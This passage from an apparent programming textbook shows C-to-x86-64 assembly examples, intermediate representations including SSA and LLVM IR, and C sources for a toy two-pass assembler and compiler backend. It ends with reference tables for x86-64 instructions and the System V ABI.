    mov edx, DWORD PTR [rbp-4]
    mov eax, DWORD PTR [rbp-8]
    add eax, edx
    pop rbp
    ret

Optimized (-O2)

add:
    lea eax, [rdi+rsi]
    ret

Control Flow

// Original C
int max(int a, int b) {
    if (a > b) return a;
    return b;
}

Generated Assembly

max:
    cmp edi, esi
    mov eax, esi
    cmovg eax, edi      ; conditional move
    ret

Loop Optimization

// Original C
int sum_array(int *arr, int n) {
    int total = 0;
    for (int i = 0; i < n; i++) {
        total += arr[i];
    }
    return total;
}

Scalar Assembly (not vectorized)

sum_array:
    test esi, esi
    jle .L3
    xor eax, eax
    xor ecx, ecx
.L2:
    add eax, [rdi+rcx*4]
    inc rcx
    cmp ecx, esi
    jl .L2
    ret
.L3:
    xor eax, eax
    ret

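With AVX2 Vectorization

sum_array_avx:
    xor eax, eax
    test esi, esi
    jle .done
    vpxor xmm0, xmm0, xmm0      ; VEX encoding zeroes all of ymm0
    xor ecx, ecx
    mov edx, esi
    and edx, -8                 ; largest multiple of 8 not above n
    jz .tail
.vec_loop:
    vpaddd ymm0, ymm0, [rdi+rcx*4]  ; 8 ints per iteration
    add ecx, 8
    cmp ecx, edx
    jl .vec_loop
    
    ; Horizontal sum
    vextracti128 xmm1, ymm0, 1
    vpaddd xmm0, xmm0, xmm1
    vpsrldq xmm1, xmm0, 8
    vpaddd xmm0, xmm0, xmm1
    vpsrldq xmm1, xmm0, 4
    vpaddd xmm0, xmm0, xmm1
    vmovd eax, xmm0
    vzeroupper
.tail:
    ; Remaining n mod 8 elements, one at a time
    cmp ecx, esi
    jge .done
.tail_loop:
    add eax, [rdi+rcx*4]
    inc ecx
    cmp ecx, esi
    jl .tail_loop
.done:
    ret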

Chapter 34: Intermediate Representations

Three-Address Code

t1 = a + b
t2 = t1 * c
d = t2 - e

Static Single Assignment (SSA)

a1 = 5
b1 = a1 + 3
c1 = b1 * 2
if (c1 > 10)
    a2 = c1 + 1
else
    a3 = c1 - 1
a4 = φ(a2, a3)

LLVM IR Example

; LLVM IR for simple function
define i32 @add(i32 %a, i32 %b) {
entry:
  %sum = add i32 %a, %b
  ret i32 %sum
}

; With control flow
define i32 @max(i32 %a, i32 %b) {
entry:
  %cmp = icmp sgt i32 %a, %b
  br i1 %cmp, label %then, label %else

then:
  br label %merge

else:
  br label %merge

merge:
  %result = phi i32 [ %a, %then ], [ %b, %else ]
  ret i32 %result
}

Chapter 35: Writing a Simple Assembler

Assembler Structure

// assembler.c - Simple two-pass assembler
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

#define MAX_LINE 256
#define MAX_SYMBOLS 1024
#define MAX_CODE 65536

typedef struct {
    char name[64];
    uint32_t address;
    int defined;
} symbol_t;

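typedef struct {
    const char *mnemonic;  // NULL marks the end of the table
    uint8_t opcode;
    int has_imm;           // nonzero: a 32-bit immediate follows the opcode
} instruction_t;

// Instruction table
// Simplified: every immediate is emitted as 32 bits (a real "int" takes an
// 8-bit immediate) and register operands are not encoded at all
instruction_t inst_table[] = {
    {"nop", 0x90, 0},
    {"mov", 0xB8, 1},  // mov eax, imm32 (simplified)
    {"add", 0x01, 0},
    {"sub", 0x29, 0},
    {"jmp", 0xE9, 1},
    {"ret", 0xC3, 0},
    {"int", 0xCD, 1},
    {NULL, 0, 0}
};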

// Symbol table
symbol_t symbols[MAX_SYMBOLS];
int symbol_count = 0;

// Generated code
uint8_t code[MAX_CODE];
uint32_t code_ptr = 0;

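// Add symbol (returns its index, or -1 if it does not fit)
int add_symbol(char *name, uint32_t addr) {
    for (int i = 0; i < symbol_count; i++) {
        if (strcmp(symbols[i].name, name) == 0) {
            symbols[i].address = addr;
            symbols[i].defined = 1;
            return i;
        }
    }
    
    // Refuse names or tables that would overflow the fixed-size storage
    if (symbol_count >= MAX_SYMBOLS ||
        strlen(name) >= sizeof(symbols[0].name)) {
        return -1;
    }
    
    strcpy(symbols[symbol_count].name, name);
    symbols[symbol_count].address = addr;
    symbols[symbol_count].defined = 1;
    return symbol_count++;
}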

// Find symbol
int find_symbol(char *name) {
    for (int i = 0; i < symbol_count; i++) {
        if (strcmp(symbols[i].name, name) == 0) {
            return i;
        }
    }
    return -1;
}

// Parse instruction and return its encoded size in bytes (-1 if unknown)
int parse_instruction(char *line, uint32_t addr) {
    char mnemonic[16];
    char operand[64];
    (void)addr;  // not needed to compute the size
    
    // Field widths keep sscanf inside the buffers
    if (sscanf(line, "%15s %63s", mnemonic, operand) < 1) return -1;
    
    // Find instruction
    instruction_t *inst = NULL;
    for (int i = 0; inst_table[i].mnemonic != NULL; i++) {
        if (strcmp(mnemonic, inst_table[i].mnemonic) == 0) {
            inst = &inst_table[i];
            break;
        }
    }
    
    if (!inst) return -1;
    
    // One opcode byte, plus a 32-bit immediate or displacement if present.
    // This must match what second_pass emits.
    return 1 + (inst->has_imm ? 4 : 0);
}

// First pass - collect labels
void first_pass(FILE *in) {
    char line[MAX_LINE];
    uint32_t addr = 0;
    
    while (fgets(line, sizeof(line), in)) {
        // Remove newline
        line[strcspn(line, "\n")] = 0;
        
        // Skip empty lines
        if (line[0] == '\0') continue;
        
        // Check for label
        if (line[strlen(line)-1] == ':') {
            line[strlen(line)-1] = 0;  // Remove colon
            add_symbol(line, addr);
            continue;
        }
        
        // Advance the address by the size of this instruction so that
        // later labels get the right offset
        int size = parse_instruction(line, addr);
        if (size > 0) addr += (uint32_t)size;
    }
    
    rewind(in);
}

// Second pass - generate code
void second_pass(FILE *in) {
    char line[MAX_LINE];
    code_ptr = 0;
    
    while (fgets(line, sizeof(line), in)) {
        line[strcspn(line, "\n")] = 0;
        if (line[0] == '\0') continue;
        
        // Skip labels
        if (line[strlen(line)-1] == ':') continue;
        
        char mnemonic[16];
        char operand[64];
        int n = sscanf(line, "%15s %63s", mnemonic, operand);
        if (n < 1) continue;
        
        // Find instruction
        instruction_t *inst = NULL;
        for (int i = 0; inst_table[i].mnemonic != NULL; i++) {
            if (strcmp(mnemonic, inst_table[i].mnemonic) == 0) {
                inst = &inst_table[i];
                break;
            }
        }
        
        if (!inst) continue;
        
        // Stop before running past the output buffer
        if (code_ptr + 5 > MAX_CODE) {
            fprintf(stderr, "output exceeds %d bytes\n", MAX_CODE);
            return;
        }
        
        // Emit opcode
        code[code_ptr++] = inst->opcode;
        
        // Emit operand
        if (inst->has_imm) {
            uint32_t value = 0;
            if (n > 1) {
                // Check if numeric or label
                char *endptr;
                long val = strtol(operand, &endptr, 0);
                if (endptr != operand && *endptr == '\0') {
                    // Numeric constant
                    value = (uint32_t)val;
                } else {
                    // Label reference
                    int sym_idx = find_symbol(operand);
                    if (sym_idx < 0) {
                        fprintf(stderr, "undefined symbol: %s\n", operand);
                    } else if (inst->opcode == 0xE9) {  // jmp
                        // rel32 is measured from the end of the instruction
                        value = symbols[sym_idx].address - (code_ptr + 4);
                    } else {
                        value = symbols[sym_idx].address;
                    }
                }
            }
            // memcpy avoids an unaligned, type-punned store
            memcpy(code + code_ptr, &value, sizeof(value));
            code_ptr += 4;
        }
    }
}

// Main assembler
int main(int argc, char **argv) {
    if (argc < 2) {
        printf("Usage: %s input.asm\n", argv[0]);
        return 1;
    }
    
    FILE *in = fopen(argv[1], "r");
    if (!in) {
        perror("fopen");
        return 1;
    }
    
    // Two-pass assembly
    first_pass(in);
    second_pass(in);
    
    fclose(in);
    
    // Output binary
    char outname[256];
    snprintf(outname, sizeof(outname), "%s.bin", argv[1]);
    
    FILE *out = fopen(outname, "wb");
    if (!out) {
        perror("fopen");
        return 1;
    }
    fwrite(code, 1, code_ptr, out);
    fclose(out);
    
    printf("Assembled %u bytes to %s\n", code_ptr, outname);
    
    return 0;
}
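
The relative-jump calculation in the second pass is the part most likely to be off by a few bytes, so it is worth isolating. The sketch below encodes a single jmp rel32; encode_jmp_rel32 is a hypothetical helper, not a function of the assembler above.

```c
#include <stddef.h>
#include <stdint.h>

/* Writes "jmp rel32" (opcode 0xE9) at offset `at` in buf and returns the
   number of bytes written. The displacement is relative to the address of
   the NEXT instruction, which is at + 5. Bytes are stored explicitly in
   little-endian order so the result does not depend on the host. */
size_t encode_jmp_rel32(uint8_t *buf, uint32_t at, uint32_t target) {
    uint32_t rel = target - (at + 5);      /* wraps to two's complement */
    buf[at]     = 0xE9;
    buf[at + 1] = (uint8_t)(rel & 0xff);
    buf[at + 2] = (uint8_t)((rel >> 8) & 0xff);
    buf[at + 3] = (uint8_t)((rel >> 16) & 0xff);
    buf[at + 4] = (uint8_t)((rel >> 24) & 0xff);
    return 5;
}
```

A jump placed at offset 5 that targets offset 0 gets the displacement -10, stored as f6 ff ff ff.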

Chapter 36: Writing a Simple Compiler Backend

Abstract Syntax Tree

// ast.h - Abstract Syntax Tree
typedef enum {
    NODE_INT,
    NODE_VAR,
    NODE_ADD,
    NODE_SUB,
    NODE_MUL,
    NODE_DIV,
    NODE_ASSIGN,
    NODE_IF,
    NODE_WHILE,
    NODE_RETURN,
    NODE_BLOCK
} node_type_t;

typedef struct ast_node {
    node_type_t type;
    union {
        int int_value;
        char *var_name;
        struct {
            struct ast_node *left;
            struct ast_node *right;
        } binary;
        struct {
            struct ast_node *cond;
            struct ast_node *then;
            struct ast_node *els;
        } if_stmt;
        struct {
            struct ast_node *cond;
            struct ast_node *body;
        } while_stmt;
        struct {
            struct ast_node *expr;
        } return_stmt;
        struct {
            struct ast_node **stmts;
            int count;
        } block;
    } data;
} ast_node_t;

Code Generation

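// codegen.c - x86-64 code generator
#include "ast.h"
#include <stdio.h>
#include <stdlib.h>

// Helpers assumed to be defined elsewhere (symbol table, AST constructors)
int find_var(const char *name);      // stack slot of a local, assumed 1-based
int count_locals(ast_node_t *func);
ast_node_t *create_int(int value);
ast_node_t *create_return(ast_node_t *expr);
ast_node_t *create_block(ast_node_t *stmt);
ast_node_t *create_function(const char *name, ast_node_t *body);

typedef struct {
    FILE *out;
    int label_counter;
} codegen_t;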

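// Generate new label
// Each label gets its own heap buffer: NODE_IF and NODE_WHILE hold two
// labels at once, so one shared static buffer would make them identical.
// The strings are not freed in this small example.
char* new_label(codegen_t *cg) {
    char *buf = malloc(32);
    if (!buf) {
        perror("malloc");
        exit(1);
    }
    snprintf(buf, 32, ".L%d", cg->label_counter++);
    return buf;
}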

// Generate code for expression (result in EAX)
void gen_expr(codegen_t *cg, ast_node_t *node) {
    switch (node->type) {
        case NODE_INT:
            fprintf(cg->out, "    mov eax, %d\n", node->data.int_value);
            break;
            
        case NODE_VAR:
            fprintf(cg->out, "    mov eax, [rbp-%d]\n", 
                    find_var(node->data.var_name) * 4);
            break;
            
        case NODE_ADD:
            gen_expr(cg, node->data.binary.left);
            fprintf(cg->out, "    push rax\n");
            gen_expr(cg, node->data.binary.right);
            fprintf(cg->out, "    pop rcx\n");
            fprintf(cg->out, "    add eax, ecx\n");
            break;
            
        case NODE_SUB:
            gen_expr(cg, node->data.binary.left);
            fprintf(cg->out, "    push rax\n");
            gen_expr(cg, node->data.binary.right);
            fprintf(cg->out, "    mov ecx, eax\n");
            fprintf(cg->out, "    pop rax\n");
            fprintf(cg->out, "    sub eax, ecx\n");
            break;
            
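        case NODE_MUL:
            gen_expr(cg, node->data.binary.left);
            fprintf(cg->out, "    push rax\n");
            gen_expr(cg, node->data.binary.right);
            fprintf(cg->out, "    pop rcx\n");
            fprintf(cg->out, "    imul eax, ecx\n");
            break;
            
        case NODE_DIV:
            gen_expr(cg, node->data.binary.left);
            fprintf(cg->out, "    push rax\n");
            gen_expr(cg, node->data.binary.right);
            fprintf(cg->out, "    mov ecx, eax\n");
            fprintf(cg->out, "    pop rax\n");
            fprintf(cg->out, "    cdq\n");        // sign-extend EAX into EDX
            fprintf(cg->out, "    idiv ecx\n");   // quotient in EAX
            break;
            
        default:
            break;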
    }
}

// Generate code for statement
void gen_stmt(codegen_t *cg, ast_node_t *node) {
    switch (node->type) {
        case NODE_ASSIGN:
            gen_expr(cg, node->data.binary.right);
            fprintf(cg->out, "    mov [rbp-%d], eax\n",
                    find_var(node->data.binary.left->data.var_name) * 4);
            break;
            
        case NODE_IF: {
            char *label_else = new_label(cg);
            char *label_end = new_label(cg);
            
            // Generate condition
            gen_expr(cg, node->data.if_stmt.cond);
            fprintf(cg->out, "    cmp eax, 0\n");
            fprintf(cg->out, "    je %s\n", label_else);
            
            // Then part
            gen_stmt(cg, node->data.if_stmt.then);
            fprintf(cg->out, "    jmp %s\n", label_end);
            
            // Else part
            fprintf(cg->out, "%s:\n", label_else);
            if (node->data.if_stmt.els) {
                gen_stmt(cg, node->data.if_stmt.els);
            }
            
            fprintf(cg->out, "%s:\n", label_end);
            break;
        }
        
        case NODE_WHILE: {
            char *label_start = new_label(cg);
            char *label_end = new_label(cg);
            
            fprintf(cg->out, "%s:\n", label_start);
            
            // Generate condition
            gen_expr(cg, node->data.while_stmt.cond);
            fprintf(cg->out, "    cmp eax, 0\n");
            fprintf(cg->out, "    je %s\n", label_end);
            
            // Loop body
            gen_stmt(cg, node->data.while_stmt.body);
            fprintf(cg->out, "    jmp %s\n", label_start);
            
            fprintf(cg->out, "%s:\n", label_end);
            break;
        }
        
        case NODE_RETURN:
            gen_expr(cg, node->data.return_stmt.expr);
            fprintf(cg->out, "    jmp .return\n");
            break;
            
        case NODE_BLOCK:
            for (int i = 0; i < node->data.block.count; i++) {
                gen_stmt(cg, node->data.block.stmts[i]);
            }
            break;
            
        default:
            break;
    }
}

// Generate function prologue
void gen_prologue(codegen_t *cg, int stack_size) {
    fprintf(cg->out, "    push rbp\n");
    fprintf(cg->out, "    mov rbp, rsp\n");
    fprintf(cg->out, "    sub rsp, %d\n", stack_size);
}

// Generate function epilogue
void gen_epilogue(codegen_t *cg) {
    fprintf(cg->out, ".return:\n");
    fprintf(cg->out, "    mov rsp, rbp\n");
    fprintf(cg->out, "    pop rbp\n");
    fprintf(cg->out, "    ret\n");
}

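// Generate complete function
// The AST above has no dedicated function node, so this sketch assumes a
// function is stored as a binary node: left = NODE_VAR (name), right = body
void gen_function(codegen_t *cg, ast_node_t *func) {
    const char *name = func->data.binary.left->data.var_name;
    
    // Stack size for local variables, rounded up to a multiple of 16
    int stack_size = (count_locals(func) * 4 + 15) & ~15;
    
    fprintf(cg->out, "global %s\n", name);
    fprintf(cg->out, "%s:\n", name);
    
    gen_prologue(cg, stack_size);
    gen_stmt(cg, func->data.binary.right);
    gen_epilogue(cg);
    
    fprintf(cg->out, "\n");
}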

// Generate entire program
void generate_program(codegen_t *cg, ast_node_t *program) {
    fprintf(cg->out, "; Generated by simple compiler\n");
    fprintf(cg->out, "section .text\n\n");
    
    for (int i = 0; i < program->data.block.count; i++) {
        gen_function(cg, program->data.block.stmts[i]);
    }
}

// Example usage
int main() {
    codegen_t cg = {stdout, 0};
    
    // Example AST for: int main() { return 42; }
    ast_node_t *program = create_block(
        create_function("main",
            create_block(
                create_return(
                    create_int(42)
                )
            )
        )
    );
    
    generate_program(&cg, program);
    
    return 0;
}
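
The frame size passed to the prologue should keep RSP 16-byte aligned, which the System V ABI requires at call sites. A minimal sketch of the rounding, assuming 4-byte local slots as in the generator above (frame_size is a hypothetical helper):

```c
/* Space for `locals` 4-byte slots, rounded up to a multiple of 16.
   After "push rbp" the stack is 16-byte aligned, so subtracting a
   multiple of 16 keeps it that way. */
int frame_size(int locals) {
    return (locals * 4 + 15) & ~15;
}
```

For one to four locals this reserves 16 bytes, and a fifth local raises the frame to 32 bytes.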

Appendices

Appendix A: Complete x86-64 Instruction Reference

Data Movement

Instruction	Description	Example
MOV	Move	`mov rax, rbx`
MOVZX	Move with zero-extend	`movzx eax, bl`
MOVSX	Move with sign-extend	`movsx rax, bx`
MOVSXD	Move with sign-extend (32->64)	`movsxd rax, ebx`
XCHG	Exchange	`xchg rax, rbx`
PUSH	Push onto stack	`push rax`
POP	Pop from stack	`pop rax`
LEA	Load effective address	`lea rax, [rbx+rcx*4]`

Arithmetic

Instruction	Description	Example
ADD	Add	`add rax, rbx`
ADC	Add with carry	`adc rax, rbx`
SUB	Subtract	`sub rax, rbx`
SBB	Subtract with borrow	`sbb rax, rbx`
MUL	Unsigned multiply	`mul rbx`
IMUL	Signed multiply	`imul rax, rbx`
DIV	Unsigned divide	`div rbx`
IDIV	Signed divide	`idiv rbx`
INC	Increment	`inc rax`
DEC	Decrement	`dec rax`
NEG	Negate	`neg rax`
CMP	Compare	`cmp rax, rbx`

Logical

Instruction	Description	Example
AND	Logical AND	`and rax, rbx`
OR	Logical OR	`or rax, rbx`
XOR	Exclusive OR	`xor rax, rax`
NOT	Complement	`not rax`
TEST	Test (AND without store)	`test rax, rax`

Shift/Rotate

Instruction	Description	Example
SHL	Shift left	`shl rax, cl`
SHR	Shift right	`shr rax, cl`
SAL	Arithmetic shift left	`sal rax, cl`
SAR	Arithmetic shift right	`sar rax, cl`
ROL	Rotate left	`rol rax, cl`
ROR	Rotate right	`ror rax, cl`
RCL	Rotate through carry left	`rcl rax, cl`
RCR	Rotate through carry right	`rcr rax, cl`

Control Transfer

Instruction	Description	Example
JMP	Unconditional jump	`jmp label`
JE/JZ	Jump if equal/zero	`je label`
JNE/JNZ	Jump if not equal/not zero	`jne label`
JG	Jump if greater (signed)	`jg label`
JL	Jump if less (signed)	`jl label`
JGE	Jump if greater/equal	`jge label`
JLE	Jump if less/equal	`jle label`
JA	Jump if above (unsigned)	`ja label`
JB	Jump if below (unsigned)	`jb label`
CALL	Call procedure	`call func`
RET	Return	`ret`
LOOP	Decrement RCX, jump if RCX != 0	`loop label`

String Operations

Instruction	Description	Example
MOVS	Move string	`movsb`
CMPS	Compare string	`cmpsb`
SCAS	Scan string	`scasb`
STOS	Store string	`stosb`
LODS	Load string	`lodsb`
REP	Repeat prefix	`rep movsb`

System Instructions

Instruction	Description	Example
SYSCALL	Fast system call	`syscall`
SYSRET	Return from syscall	`sysret`
INT	Software interrupt	`int 0x80`
IRET	Return from interrupt	`iret`
HLT	Halt processor	`hlt`
RDMSR	Read model-specific register	`rdmsr`
WRMSR	Write model-specific register	`wrmsr`
CPUID	Processor identification	`cpuid`
RDTSC	Read timestamp counter	`rdtsc`

SIMD Instructions

Instruction	Description	Example
MOVAPS	Move aligned packed single	`movaps xmm0, xmm1`
MOVUPS	Move unaligned packed single	`movups xmm0, [mem]`
ADDPS	Add packed single	`addps xmm0, xmm1`
SUBPS	Subtract packed single	`subps xmm0, xmm1`
MULPS	Multiply packed single	`mulps xmm0, xmm1`
DIVPS	Divide packed single	`divps xmm0, xmm1`
SQRTPS	Square root packed single	`sqrtps xmm0, xmm1`
ANDPS	Bitwise AND of packed single	`andps xmm0, xmm1`
ORPS	Bitwise OR	`orps xmm0, xmm1`
XORPS	Bitwise XOR	`xorps xmm0, xmm1`

Appendix B: System V ABI Reference

Register Usage

rax:      Return value, scratch
rbx:      Callee-saved
rcx:      Scratch (argument 4)
rdx:      Scratch (argument 3, return high)
rsi:      Scratch (argument 2)
rdi:      Scratch (argument 1)
rbp:      Callee-saved (frame pointer)
rsp:      Stack pointer
r8:       Scratch (argument 5)
r9:       Scratch (argument 6)
r10-r11:  Scratch
r12-r15:  Callee-saved
xmm0-1:   Return value, arguments
xmm2-7:   Arguments
xmm8-15:  Scratch (caller-saved)

Stack Frame

High addresses
+-----------------+
| Caller's frame  |
+-----------------+ <-- 16-byte aligned
| Return address  |
+-----------------+ <-- rbp+8
| Saved rbp       |
+-----------------+ <-- rbp
| Local vars      |
| (alignment)     |
+-----------------+ <-- rsp
Low addresses

Appendix C: Windows x64 ABI Reference